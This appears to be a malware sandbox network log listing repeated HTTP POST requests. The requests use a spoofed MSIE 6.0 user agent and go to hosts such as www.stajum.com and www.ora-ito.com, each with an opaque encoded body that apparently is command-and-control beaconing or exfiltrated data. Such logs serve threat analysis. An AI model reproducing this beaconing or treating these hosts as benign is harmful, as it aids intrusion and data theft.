                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 5a 41 45 66 4c 48 76 57 42 63 35 44 39 46 38 77 45 74 6b 79 2b 47 54 32 4a 6c 71 42 38 71 59 7a 33 32 2f 7a 55 38 59 58 6b 37 39 35 4b 66 30 77 47 61 42 4f 32 63 30 4d 2f 4f 43 70 6b 47 7a 66 38 54 46 44 69 61 41 67 44 6b 6c 50 6f 4f 34 38 46 30 5a 4b 58 76 4e 66 7a 45 56 39 49 74 6b 75 46 6f 46 2b 52 47 6a 7a 6f 30 46 61 70 62 62 59 48 58 67 49 4f 68 73 57 76 70 34 74 55 6c 68 51 6c 46 58 4d 2f 36 47 43 32 67 57 52 72 45 6d 43 49 30 4a 6e 6b 4a 48 64 51 61 65 79 6d 56 5a 30 72 38 46 4b 67 41 55 52 32 74 43 66 74 5a 61 65 4e 73 69 51 4a 42 69 59 43 74 70 73 37 47 5a 6d 39 4e 49 4d 30 7a 4a 4c 52 2b 78 75 44 79 77 69 4c 4e 50 6c 4d 51 32 38 4e 75 71 55 2b 73 55 59 35 59 38 74 58 53 41 76 46 53 33 35 45 66 37 2b 34 50 4d 51 37 30 54 53 50 65 65 69 6f 6b 79 39 6d 41 7a 71 34 4b 66 36 77 67 6a 7a 78 51 73 54 79 39 61 49 43 44 74 45 62 65 6d 70 49 42 72 39 69 53 55 39 34 6d 61 53 6f 37 4d 38 42 47 52 46 34 44 2f 67 77 33 65 2b 56 46 61 4f 74 4a 78 47 47 37 41 57 42 31 4e 46 4a 45 4f 4d 34 52 36 6b 47 66 34 7a 34 46 4b 68 6a 65 4e 41 2f 4a 55 4e 42 49 54 6e 5a 67 62 54 73 64 6a 2f 55 4a 5a 57 61 4e 74 45 6f 6f 65 57 2f 77 33 53 77 39 38 6c 4b 33 30 73 46 2f 45 4d 31 65 66 65 6e 56 51 78 4b 42 61 6a 42 38 37 7a 4e 2b 72 47 72 55 62 38 32 4c 51 44 73 32 4f 38 30 4c 50 52 6e 73 32 38 52 59 48 49 71 76 79 67 68 46 36 46 35 6b 2f 33 5a 6d 43 64 48 41 54 6c 55 4f 6b 42 43 45 39 54 41 39 55 4a 43 64 6e 69 66 72 55 6b 61 31 35 44 4a 6d 76 62 61 56 4c 68 36 34 34 37 30 53 76 37 57 53 7a 68 4e 6f 70 36 73 73 36 36 68 51 6e 5a 35 4e 75 37 79 53 46 75 49 41 57 79 71 78 70 39 65 46 47 48 6a 6d 4c 35 5a 7a 76 59 65 62 6c 4e 6f 41 58 4e 58 6f 69 50 4b 36 34 57 30 59 76 39 41 6c 38 49 6e 6b 45 52 45 77 51 55 31 32 41 6c 79 59 2b 4c 53 6c 52 39 63 39 31 74 Data Ascii: ZAEfLHvWBc5D9F8wEtky+GT2JlqB8qYz32/zU8YXk795Kf0wGaBO2c0M/OCpkGzf8TFDiaAgDklPoO48F0ZKXvNfzEV9ItkuFoF+RGjzo0FapbbYHXgIOhsWvp4tUlhQlFXM/6GC2gWRrEmCI0JnkJHdQaeymVZ0r8FKgAUR2tCftZaeNsiQJBiYCtps7GZm9NIM0zJLR+xuDywiLNPlMQ28NuqU+sUY5Y8tXSAvFS35Ef7+4PMQ70TSPeeioky9mAzq4Kf6wgjzxQsTy9aICDtEbempIBr9iSU94maSo7M8BGRF4D/gw3e+VFaOtJxGG7AWB1NFJEOM4R6kGf4z4FKhjeNA/JUNBITnZgbTsdj/UJZWaNtEooeW/w3Sw98lK30sF/EM1efenVQxKBajB87zN+rGrUb82LQDs2O80LPRns28RYHIqvyghF6F5k/3ZmCdHATlUOkBCE9TA9UJCdnifrUka15DJmvbaVLh64470Sv7WSzhNop6ss66hQnZ5Nu7ySFuIAWyqxp9eFGHjmL5ZzvYeblNoAXNXoiPK64W0Yv9Al8InkEREwQU12AlyY+LSlR9c91t
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 31 42 43 4b 37 73 6f 6d 44 4d 37 43 4c 53 7a 63 4c 57 63 37 56 49 31 65 64 6b 31 36 42 76 31 64 6e 6a 56 56 78 71 68 43 72 34 7a 67 47 51 51 6e 54 68 61 54 62 6e 53 58 31 70 63 64 59 6a 4d 4d 54 35 78 71 4b 39 4f 31 4a 2b 65 53 4b 36 53 34 44 37 56 47 79 56 50 41 45 42 4b 41 63 78 34 75 4a 4e 39 70 66 7a 33 6e 2f 55 66 63 49 69 75 4f 47 35 59 38 6c 56 48 69 50 76 42 4b 63 52 6c 37 53 66 74 39 44 61 2f 61 72 6f 32 48 32 79 61 37 30 72 53 64 63 63 2f 6d 47 77 49 57 56 44 63 43 79 50 78 50 49 6c 6e 6a 75 36 43 33 6b 75 4f 51 4b 45 4d 5a 32 77 4a 73 6e 55 64 2b 5a 65 57 46 51 44 43 72 4c 4e 6d 2b 69 75 6e 37 47 34 61 47 55 51 50 58 4b 51 61 59 72 65 57 76 4b 54 68 6a 6b 4d 6a 6a 47 6f 71 70 66 52 6a 47 78 7a 4b 6e 6f 75 4b 4c 63 67 72 52 63 31 33 35 6f 77 57 57 61 52 30 72 67 33 41 65 68 49 72 37 57 4e 34 74 2b 73 73 67 77 37 77 47 67 45 67 35 4f 65 65 51 46 33 44 39 71 37 4b 57 39 50 4b 30 45 39 78 74 6d 4f 48 61 6a 37 71 58 42 6f 52 33 6c 77 2b 4d 67 78 31 31 4e 4b 4d 64 4f 67 58 67 2f 52 48 4f 6b 65 76 63 39 61 54 2f 35 75 70 51 33 61 4d 49 6a 47 35 6a 66 6c 45 6b 67 32 2b 61 52 4d 68 56 78 44 62 75 32 6b 34 2f 4e 41 35 44 42 54 52 64 32 65 6f 2f 6a 36 46 46 7a 42 43 65 30 79 45 35 6e 68 42 6a 69 48 72 4b 55 6b 30 4f 4b 74 43 4f 4c 6f 34 58 2b 43 73 69 30 4e 4f 73 65 39 5a 64 5a 5a 4a 4b 6a 54 63 2b 65 50 77 6e 45 62 2f 57 78 30 59 43 42 4f 70 41 6a 7a 53 6a 69 4a 2b 62 6f 30 33 50 4d 46 7a 4f 54 54 73 64 77 46 6f 51 66 49 75 52 51 69 76 49 57 55 59 53 56 76 4b 56 65 6e 34 6c 35 67 6d 31 53 55 57 59 78 39 61 42 4d 61 34 49 72 77 45 70 30 30 76 35 45 59 71 6b 70 6b 68 79 72 7a 76 4e 5a 2f 32 51 44 51 74 7a 2b 69 35 2f 2b 4e 51 42 2b 48 54 4f 51 7a 38 41 30 52 74 49 59 6d 6b 53 45 6e 64 58 64 76 2f 4b 50 67 3d 3d Data Ascii: 1BCK7somDM7CLSzcLWc7VI1edk16Bv1dnjVVxqhCr4zgGQQnThaTbnSX1pcdYjMMT5xqK9O1J+eSK6S4D7VGyVPAEBKAcx4uJN9pfz3n/UfcIiuOG5Y8lVHiPvBKcRl7Sft9Da/aro2H2ya70rSdcc/mGwIWVDcCyPxPIlnju6C3kuOQKEMZ2wJsnUd+ZeWFQDCrLNm+iun7G4aGUQPXKQaYreWvKThjkMjjGoqpfRjGxzKnouKLcgrRc135owWWaR0rg3AehIr7WN4t+ssgw7wGgEg5OeeQF3D9q7KW9PK0E9xtmOHaj7qXBoR3lw+Mgx11NKMdOgXg/RHOkevc9aT/5upQ3aMIjG5jflEkg2+aRMhVxDbu2k4/NA5DBTRd2eo/j6FFzBCe0yE5nhBjiHrKUk0OKtCOLo4X+Csi0NOse9ZdZZJKjTc+ePwnEb/Wx0YCBOpAjzSjiJ+bo03PMFzOTTsdwFoQfIuRQivIWUYSVvKVen4l5gm1SUWYx9aBMa4IrwEp00v5EYqkpkhyrzvNZ/2QDQtz+i5/+NQB+HTOQz8A0RtIYmkSEndXdv/KPg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 6d 54 77 53 77 48 6d 6b 43 73 34 4b 41 76 32 6d 43 49 4e 53 41 42 49 37 36 76 68 58 41 2b 7a 46 76 51 36 61 39 35 6c 65 76 58 69 33 4c 6f 68 2b 43 42 5a 45 2b 45 62 30 58 5a 62 39 68 42 4a 45 45 64 55 75 4b 55 64 70 62 6e 51 47 31 48 6c 47 57 59 45 41 55 42 74 52 76 72 62 34 56 6d 47 32 49 44 63 71 2f 33 36 4b 52 6e 42 64 2f 51 72 57 69 55 67 78 57 72 2b 4d 39 72 79 7a 73 73 66 36 45 56 32 55 33 46 6d 4d 62 55 46 6c 4c 59 76 6d 35 4a 54 6e 52 6c 4e 56 46 62 37 6c 39 62 44 66 70 2b 67 41 43 4f 42 5a 70 79 2b 67 6c 4f 65 50 4b 53 35 59 34 43 55 74 56 37 56 30 48 4e 66 50 75 4b 70 6a 76 4b 7a 37 66 75 6c 35 65 75 67 46 30 4f 31 32 56 66 6f 43 6a 75 42 35 77 4c 53 76 46 79 6f 42 4f 35 55 67 47 4d 55 48 45 31 41 75 44 4d 71 52 7a 4f 52 2b 56 51 2b 75 54 63 72 55 70 49 63 66 47 6c 53 78 71 6c 64 55 30 53 6c 35 58 73 56 43 71 58 65 37 36 77 4e 61 41 43 50 77 74 56 56 6a 51 44 4b 44 72 70 56 30 42 2f 72 6e 63 50 72 36 6d 4b 74 79 67 48 4a 62 4a 6d 4e 6d 6a 77 38 70 64 48 44 35 61 45 61 54 45 59 53 4c 58 61 71 62 65 30 31 2b 6b 72 69 41 79 4f 6d 59 58 72 76 35 31 35 41 72 7a 73 2f 7a 7a 62 42 31 72 49 74 66 74 4d 38 79 78 64 50 75 2b 66 2b 58 47 4c 58 59 63 46 4a 4d 31 43 5a 4d 4b 79 68 42 77 50 48 53 69 55 48 2f 59 58 30 50 30 62 64 36 5a 2b 57 64 47 30 4b 2b 43 71 67 6d 6d 4a 32 65 37 46 4e 68 5a 77 59 6d 6a 66 34 5a 44 6e 48 33 2f 77 72 76 57 44 32 74 62 4f 67 5a 34 57 48 46 74 58 6d 65 61 41 4c 74 4e 42 39 6e 4b 71 54 41 62 68 6f 39 62 33 45 44 37 5a 36 38 34 69 39 44 6b 53 46 74 7a 53 32 70 61 69 41 4c 48 57 52 74 30 6e 59 49 38 43 41 4b 30 37 37 42 2b 42 52 33 43 53 61 75 51 6b 46 48 62 76 34 46 69 44 35 38 34 42 45 50 69 6b 76 53 67 70 6f 31 31 74 70 78 30 34 4d 4c 72 57 6b 6d 69 41 36 4b 67 48 73 66 34 55 45 3d Data Ascii: mTwSwHmkCs4KAv2mCINSABI76vhXA+zFvQ6a95levXi3Loh+CBZE+Eb0XZb9hBJEEdUuKUdpbnQG1HlGWYEAUBtRvrb4VmG2IDcq/36KRnBd/QrWiUgxWr+M9ryzssf6EV2U3FmMbUFlLYvm5JTnRlNVFb7l9bDfp+gACOBZpy+glOePKS5Y4CUtV7V0HNfPuKpjvKz7ful5eugF0O12VfoCjuB5wLSvFyoBO5UgGMUHE1AuDMqRzOR+VQ+uTcrUpIcfGlSxqldU0Sl5XsVCqXe76wNaACPwtVVjQDKDrpV0B/rncPr6mKtygHJbJmNmjw8pdHD5aEaTEYSLXaqbe01+kriAyOmYXrv515Arzs/zzbB1rItftM8yxdPu+f+XGLXYcFJM1CZMKyhBwPHSiUH/YX0P0bd6Z+WdG0K+CqgmmJ2e7FNhZwYmjf4ZDnH3/wrvWD2tbOgZ4WHFtXmeaALtNB9nKqTAbho9b3ED7Z684i9DkSFtzS2paiALHWRt0nYI8CAK077B+BR3CSauQkFHbv4FiD584BEPikvSgpo11tpx04MLrWkmiA6KgHsf4UE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 34 57 71 6d 61 67 6e 50 49 4d 34 30 7a 57 66 71 57 41 78 34 2f 69 49 51 57 44 34 6e 75 59 78 44 54 52 4b 67 4d 6d 37 46 41 4f 4d 54 49 4d 4b 32 66 76 76 6b 34 35 6e 79 5a 69 34 67 31 56 57 4c 37 4a 76 36 78 30 2f 36 79 2f 50 74 54 36 69 63 61 6a 48 77 59 6c 6e 6e 41 67 71 67 31 50 33 5a 6c 4f 66 38 6d 54 72 47 4d 55 4b 2f 48 58 63 6d 73 70 53 66 63 63 67 30 79 6c 4b 70 74 4d 6f 49 43 2f 2b 6a 6b 74 62 66 33 31 45 45 47 43 44 57 42 41 4f 37 4b 4b 45 54 43 69 6e 4b 30 37 4d 6c 7a 62 4b 72 52 50 78 56 62 78 4b 63 6a 32 38 54 2f 79 31 53 6d 34 72 78 6d 6e 4b 4d 59 51 65 53 4e 7a 59 68 58 58 68 2f 37 51 59 4e 32 5a 76 30 62 33 50 2b 4d 73 75 33 6c 30 57 79 4f 58 6e 39 35 59 78 31 5a 49 62 4b 2f 42 4f 72 59 64 35 4a 72 69 63 44 69 44 30 55 54 42 46 76 2f 47 57 4b 57 4d 6d 57 47 39 49 30 6b 37 65 55 2f 35 2f 34 49 6b 56 43 66 4e 67 4d 6d 69 34 63 6e 62 68 61 75 31 56 6c 57 7a 58 49 4d 77 41 2b 76 2b 31 51 48 33 70 53 6e 45 4c 77 68 45 76 49 44 54 4a 30 66 30 6f 79 61 61 52 70 4c 75 62 67 59 38 32 61 67 74 71 71 35 39 75 46 79 43 62 69 30 4f 63 76 6e 64 42 62 71 6a 6b 49 55 38 4c 4f 35 78 36 50 70 61 59 4d 5a 50 78 73 56 2b 70 47 56 46 35 4d 4b 69 39 30 63 7a 56 49 74 51 6c 30 59 58 6d 67 2b 5a 31 54 37 71 69 36 6e 4b 63 42 44 30 33 42 43 2f 4d 65 37 46 67 4b 64 76 6c 4d 64 51 49 51 54 61 42 7a 44 4b 54 34 77 4a 4b 6a 6d 6e 76 50 6e 56 6b 39 76 62 34 72 68 57 51 63 6a 56 59 79 7a 6a 2f 58 32 54 74 2b 4c 45 68 41 39 2f 33 4c 64 69 6c 6b 38 49 63 67 49 4d 61 6e 38 74 5a 65 58 34 57 37 50 7a 4a 71 70 4d 55 70 76 6d 59 71 37 36 5a 61 36 76 4d 6e 42 54 53 68 79 67 77 55 6e 41 76 36 50 6c 2b 35 2b 6c 56 47 54 78 61 58 71 6e 57 4a 68 2f 37 44 6e 58 77 51 74 74 44 6d 33 6c 4b 73 6c 33 51 4c 4b 47 6b 3d Data Ascii: 4WqmagnPIM40zWfqWAx4/iIQWD4nuYxDTRKgMm7FAOMTIMK2fvvk45nyZi4g1VWL7Jv6x0/6y/PtT6icajHwYlnnAgqg1P3ZlOf8mTrGMUK/HXcmspSfccg0ylKptMoIC/+jktbf31EEGCDWBAO7KKETCinK07MlzbKrRPxVbxKcj28T/y1Sm4rxmnKMYQeSNzYhXXh/7QYN2Zv0b3P+Msu3l0WyOXn95Yx1ZIbK/BOrYd5JricDiD0UTBFv/GWKWMmWG9I0k7eU/5/4IkVCfNgMmi4cnbhau1VlWzXIMwA+v+1QH3pSnELwhEvIDTJ0f0oyaaRpLubgY82agtqq59uFyCbi0OcvndBbqjkIU8LO5x6PpaYMZPxsV+pGVF5MKi90czVItQl0YXmg+Z1T7qi6nKcBD03BC/Me7FgKdvlMdQIQTaBzDKT4wJKjmnvPnVk9vb4rhWQcjVYyzj/X2Tt+LEhA9/3Ldilk8IcgIMan8tZeX4W7PzJqpMUpvmYq76Za6vMnBTShygwUnAv6Pl+5+lVGTxaXqnWJh/7DnXwQttDm3lKsl3QLKGk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 6d 54 77 53 77 48 6d 6b 43 73 34 4b 41 76 32 6d 43 49 4e 53 41 42 49 37 36 76 68 58 41 2b 7a 46 76 51 36 61 39 35 6c 65 76 58 69 33 4c 6f 68 2b 43 42 5a 45 2b 45 62 30 58 5a 62 39 68 42 4a 45 45 64 55 75 4b 55 64 70 62 6e 51 47 31 48 6c 47 57 59 45 41 55 42 74 52 76 72 62 34 56 6d 47 32 49 44 63 71 2f 33 36 4b 52 6e 42 64 2f 51 72 57 69 55 67 78 57 72 2b 4d 39 72 79 7a 73 73 66 36 45 56 32 55 33 46 6d 4d 62 55 46 6c 4c 59 76 6d 35 4a 54 6e 52 6c 4e 56 46 62 37 6c 39 62 44 66 70 2b 67 41 43 4f 42 5a 70 79 2b 67 6c 4f 65 50 4b 53 35 59 34 43 55 74 56 37 56 30 48 4e 66 50 75 4b 70 6a 76 4b 7a 37 66 75 6c 35 65 75 67 46 30 4f 31 32 56 66 6f 43 6a 75 42 35 77 4c 53 76 46 79 6f 42 4f 35 55 67 47 4d 55 48 45 31 41 75 44 4d 71 52 7a 4f 52 2b 56 51 2b 75 54 63 72 55 70 49 63 66 47 6c 53 78 71 6c 64 55 30 53 6c 35 58 73 56 43 71 58 65 37 36 77 4e 61 41 43 50 77 74 56 56 6a 51 44 4b 44 72 70 56 30 42 2f 72 6e 63 50 72 36 6d 4b 74 79 67 48 4a 62 4a 6d 4e 6d 6a 77 38 70 64 48 44 35 61 45 61 54 45 59 53 4c 58 61 71 62 65 30 31 2b 6b 72 69 41 79 4f 6d 59 58 72 76 35 31 35 41 72 7a 73 2f 7a 7a 62 42 31 72 49 74 66 74 4d 38 79 78 64 50 75 2b 66 2b 58 47 4c 58 59 63 46 4a 4d 31 43 5a 4d 4b 79 68 42 77 50 48 53 69 55 48 2f 59 58 30 50 30 62 64 36 5a 2b 57 64 47 30 4b 2b 43 71 67 6d 6d 4a 32 65 37 46 4e 68 5a 77 59 6d 6a 66 34 5a 44 6e 48 33 2f 77 72 76 57 44 32 74 62 4f 67 5a 34 57 48 46 74 58 6d 65 61 41 4c 74 4e 42 39 6e 4b 71 54 41 62 68 6f 39 62 33 45 44 37 5a 36 38 34 69 39 44 6b 53 46 74 7a 53 32 70 61 69 41 4c 48 57 52 74 30 6e 59 49 38 43 41 4b 30 37 37 42 2b 42 52 33 43 53 61 75 51 6b 46 48 62 76 34 46 69 44 35 38 34 42 45 50 69 6b 76 53 67 70 6f 31 31 74 70 78 30 34 4d 4c 72 57 6b 6d 69 41 36 4b 67 48 73 66 34 55 45 3d Data Ascii: mTwSwHmkCs4KAv2mCINSABI76vhXA+zFvQ6a95levXi3Loh+CBZE+Eb0XZb9hBJEEdUuKUdpbnQG1HlGWYEAUBtRvrb4VmG2IDcq/36KRnBd/QrWiUgxWr+M9ryzssf6EV2U3FmMbUFlLYvm5JTnRlNVFb7l9bDfp+gACOBZpy+glOePKS5Y4CUtV7V0HNfPuKpjvKz7ful5eugF0O12VfoCjuB5wLSvFyoBO5UgGMUHE1AuDMqRzOR+VQ+uTcrUpIcfGlSxqldU0Sl5XsVCqXe76wNaACPwtVVjQDKDrpV0B/rncPr6mKtygHJbJmNmjw8pdHD5aEaTEYSLXaqbe01+kriAyOmYXrv515Arzs/zzbB1rItftM8yxdPu+f+XGLXYcFJM1CZMKyhBwPHSiUH/YX0P0bd6Z+WdG0K+CqgmmJ2e7FNhZwYmjf4ZDnH3/wrvWD2tbOgZ4WHFtXmeaALtNB9nKqTAbho9b3ED7Z684i9DkSFtzS2paiALHWRt0nYI8CAK077B+BR3CSauQkFHbv4FiD584BEPikvSgpo11tpx04MLrWkmiA6KgHsf4UE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 34 57 71 6d 61 67 6e 50 49 4d 34 30 7a 57 66 71 57 41 78 34 2f 69 49 51 57 44 34 6e 75 59 78 44 54 52 4b 67 4d 6d 37 46 41 4f 4d 54 49 4d 4b 32 66 76 76 6b 34 35 6e 79 5a 69 34 67 31 56 57 4c 37 4a 76 36 78 30 2f 36 79 2f 50 74 54 36 69 63 61 6a 48 77 59 6c 6e 6e 41 67 71 67 31 50 33 5a 6c 4f 66 38 6d 54 72 47 4d 55 4b 2f 48 58 63 6d 73 70 53 66 63 63 67 30 79 6c 4b 70 74 4d 6f 49 43 2f 2b 6a 6b 74 62 66 33 31 45 45 47 43 44 57 42 41 4f 37 4b 4b 45 54 43 69 6e 4b 30 37 4d 6c 7a 62 4b 72 52 50 78 56 62 78 4b 63 6a 32 38 54 2f 79 31 53 6d 34 72 78 6d 6e 4b 4d 59 51 65 53 4e 7a 59 68 58 58 68 2f 37 51 59 4e 32 5a 76 30 62 33 50 2b 4d 73 75 33 6c 30 57 79 4f 58 6e 39 35 59 78 31 5a 49 62 4b 2f 42 4f 72 59 64 35 4a 72 69 63 44 69 44 30 55 54 42 46 76 2f 47 57 4b 57 4d 6d 57 47 39 49 30 6b 37 65 55 2f 35 2f 34 49 6b 56 43 66 4e 67 4d 6d 69 34 63 6e 62 68 61 75 31 56 6c 57 7a 58 49 4d 77 41 2b 76 2b 31 51 48 33 70 53 6e 45 4c 77 68 45 76 49 44 54 4a 30 66 30 6f 79 61 61 52 70 4c 75 62 67 59 38 32 61 67 74 71 71 35 39 75 46 79 43 62 69 30 4f 63 76 6e 64 42 62 71 6a 6b 49 55 38 4c 4f 35 78 36 50 70 61 59 4d 5a 50 78 73 56 2b 70 47 56 46 35 4d 4b 69 39 30 63 7a 56 49 74 51 6c 30 59 58 6d 67 2b 5a 31 54 37 71 69 36 6e 4b 63 42 44 30 33 42 43 2f 4d 65 37 46 67 4b 64 76 6c 4d 64 51 49 51 54 61 42 7a 44 4b 54 34 77 4a 4b 6a 6d 6e 76 50 6e 56 6b 39 76 62 34 72 68 57 51 63 6a 56 59 79 7a 6a 2f 58 32 54 74 2b 4c 45 68 41 39 2f 33 4c 64 69 6c 6b 38 49 63 67 49 4d 61 6e 38 74 5a 65 58 34 57 37 50 7a 4a 71 70 4d 55 70 76 6d 59 71 37 36 5a 61 36 76 4d 6e 42 54 53 68 79 67 77 55 6e 41 76 36 50 6c 2b 35 2b 6c 56 47 54 78 61 58 71 6e 57 4a 68 2f 37 44 6e 58 77 51 74 74 44 6d 33 6c 4b 73 6c 33 51 4c 4b 47 6b 3d Data Ascii: 4WqmagnPIM40zWfqWAx4/iIQWD4nuYxDTRKgMm7FAOMTIMK2fvvk45nyZi4g1VWL7Jv6x0/6y/PtT6icajHwYlnnAgqg1P3ZlOf8mTrGMUK/HXcmspSfccg0ylKptMoIC/+jktbf31EEGCDWBAO7KKETCinK07MlzbKrRPxVbxKcj28T/y1Sm4rxmnKMYQeSNzYhXXh/7QYN2Zv0b3P+Msu3l0WyOXn95Yx1ZIbK/BOrYd5JricDiD0UTBFv/GWKWMmWG9I0k7eU/5/4IkVCfNgMmi4cnbhau1VlWzXIMwA+v+1QH3pSnELwhEvIDTJ0f0oyaaRpLubgY82agtqq59uFyCbi0OcvndBbqjkIU8LO5x6PpaYMZPxsV+pGVF5MKi90czVItQl0YXmg+Z1T7qi6nKcBD03BC/Me7FgKdvlMdQIQTaBzDKT4wJKjmnvPnVk9vb4rhWQcjVYyzj/X2Tt+LEhA9/3Ldilk8IcgIMan8tZeX4W7PzJqpMUpvmYq76Za6vMnBTShygwUnAv6Pl+5+lVGTxaXqnWJh/7DnXwQttDm3lKsl3QLKGk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 38 7a 32 6b 46 44 43 56 52 38 37 31 4e 45 45 4b 51 36 59 79 7a 65 50 6e 72 69 44 59 77 2f 6f 48 5a 49 66 54 54 4b 68 4a 61 47 57 4f 4a 6c 48 46 78 79 41 45 4b 36 37 7a 6e 6b 79 47 32 36 2b 37 45 79 6f 67 6c 52 35 78 65 72 77 34 53 55 4a 38 63 6c 39 71 30 77 48 78 35 4c 72 73 57 45 30 55 65 35 68 78 43 65 58 74 52 67 71 45 51 56 6a 56 39 76 33 6c 31 73 7a 4a 31 55 79 45 50 74 6f 44 56 49 51 51 2b 55 58 48 32 37 4c 30 42 7a 32 74 30 4e 43 54 6b 70 55 52 35 6d 63 47 7a 4a 56 46 4c 4d 41 64 69 6b 56 57 62 6d 56 44 65 75 68 50 4a 6a 47 47 45 7a 34 68 69 58 33 73 4d 2b 33 6c 50 6b 68 65 34 31 53 67 62 30 49 4c 38 68 65 49 30 4c 6d 2f 7a 6e 59 71 42 69 33 35 37 39 56 55 47 6a 6c 74 34 45 78 7a 51 6f 65 6e 31 55 54 77 5a 2f 66 66 67 39 43 32 34 6a 7a 62 37 49 39 51 46 77 6f 67 41 4b 51 4c 47 42 46 41 67 44 63 31 51 50 38 67 53 6a 69 34 49 50 61 62 50 43 59 75 30 6e 79 32 31 59 4f 43 6f 2b 35 35 46 44 39 38 6a 37 35 4e 51 46 77 77 6f 77 5a 55 68 76 4c 41 79 50 2f 45 51 41 37 65 4a 31 62 73 4a 59 49 73 41 71 4e 4f 75 36 56 62 50 42 50 57 76 71 32 4f 6d 58 74 31 56 4f 30 62 54 57 52 35 77 73 2f 45 43 61 32 53 39 49 79 65 55 30 35 67 2f 75 59 53 41 52 61 37 31 51 68 4a 62 50 58 6c 38 38 76 71 77 30 44 44 68 6e 52 5a 79 48 69 42 6a 4e 67 4d 4e 62 71 4b 49 48 4c 77 52 46 54 79 4b 6b 6b 66 66 69 73 32 34 67 4e 59 39 61 70 76 6c 41 42 30 79 4a 70 76 55 66 49 5a 2f 66 61 45 30 30 30 34 74 55 6a 73 77 6f 61 51 72 37 6e 55 5a 47 4b 4b 42 79 76 73 52 59 76 32 42 6e 43 70 6d 49 37 36 69 67 68 46 79 71 55 6e 42 35 31 70 58 66 2b 43 69 75 4e 79 44 42 61 6c 79 32 43 65 31 76 30 52 76 55 64 57 33 41 3d 3d Data Ascii: 8z2kFDCVR871NEEKQ6YyzePnriDYw/oHZIfTTKhJaGWOJlHFxyAEK67znkyG26+7EyoglR5xerw4SUJ8cl9q0wHx5LrsWE0Ue5hxCeXtRgqEQVjV9v3l1szJ1UyEPtoDVIQQ+UXH27L0Bz2t0NCTkpUR5mcGzJVFLMAdikVWbmVDeuhPJjGGEz4hiX3sM+3lPkhe41Sgb0IL8heI0Lm/znYqBi3579VUGjlt4ExzQoen1UTwZ/ffg9C24jzb7I9QFwogAKQLGBFAgDc1QP8gSji4IPabPCYu0ny21YOCo+55FD98j75NQFwwowZUhvLAyP/EQA7eJ1bsJYIsAqNOu6VbPBPWvq2OmXt1VO0bTWR5ws/ECa2S9IyeU05g/uYSARa71QhJbPXl88vqw0DDhnRZyHiBjNgMNbqKIHLwRFTyKkkffis24gNY9apvlAB0yJpvUfIZ/faE0004tUjswoaQr7nUZGKKByvsRYv2BnCpmI76ighFyqUnB51pXf+CiuNyDBaly2Ce1v0RvUdW3A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.railbook.netCache-Control: no-cacheData Raw: 54 72 2f 4d 69 42 36 72 55 38 35 34 35 72 33 42 61 5a 66 4b 77 67 48 71 6d 71 35 65 30 37 78 36 4d 76 58 7a 39 76 6a 50 77 55 48 70 7a 4a 33 6d 51 6c 74 54 52 35 51 49 79 2b 4b 41 6f 64 51 4e 79 71 41 65 4b 4e 6a 4c 6f 2b 79 54 4e 4f 72 79 35 2f 6e 58 65 38 6c 62 39 6b 68 2f 36 6e 61 30 38 50 68 54 2b 6f 42 53 79 61 74 71 31 47 77 6e 47 46 62 38 65 77 64 77 42 6d 4e 2b 69 37 61 4e 4a 59 49 53 44 4c 34 4f 2b 4d 31 64 6c 38 78 78 37 35 61 33 43 65 44 49 50 6a 5a 33 54 6d 65 57 47 6c 52 4c 7a 6f 4c 4e 7a 69 39 63 76 53 52 50 50 5a 42 68 6e 61 6f 41 67 61 6b 48 53 2b 74 33 43 38 56 4d 76 6a 41 6f 6e 31 51 64 31 6a 65 77 39 4c 49 70 52 74 55 61 63 59 53 44 63 7a 45 34 38 34 32 33 50 6b 33 38 6c 52 74 48 4c 62 32 6a 43 6f 34 77 31 70 59 37 46 57 4c 46 48 65 4f 35 71 61 4f 66 76 50 32 63 6e 2f 70 38 7a 6e 32 43 68 33 58 5a 67 78 35 59 66 43 63 4a 47 55 4a 71 53 7a 78 76 6b 63 41 78 6e 33 49 7a 44 6d 65 34 34 6b 73 4f 62 2f 47 65 64 38 66 43 34 6b 35 66 4f 47 4e 47 70 43 69 44 45 77 44 50 6e 64 4a 57 51 58 57 45 71 79 44 43 43 68 70 4d 59 6b 41 76 37 62 52 44 30 72 32 58 35 56 31 66 77 62 2b 64 70 4d 63 72 69 61 6a 64 78 78 52 4c 75 73 53 66 48 4a 6e 4d 61 36 75 79 6a 30 6a 6b 47 69 56 58 65 44 38 4f 56 46 6b 67 49 4e 66 41 63 52 62 32 42 71 75 49 63 64 71 43 41 52 69 73 57 35 6d 75 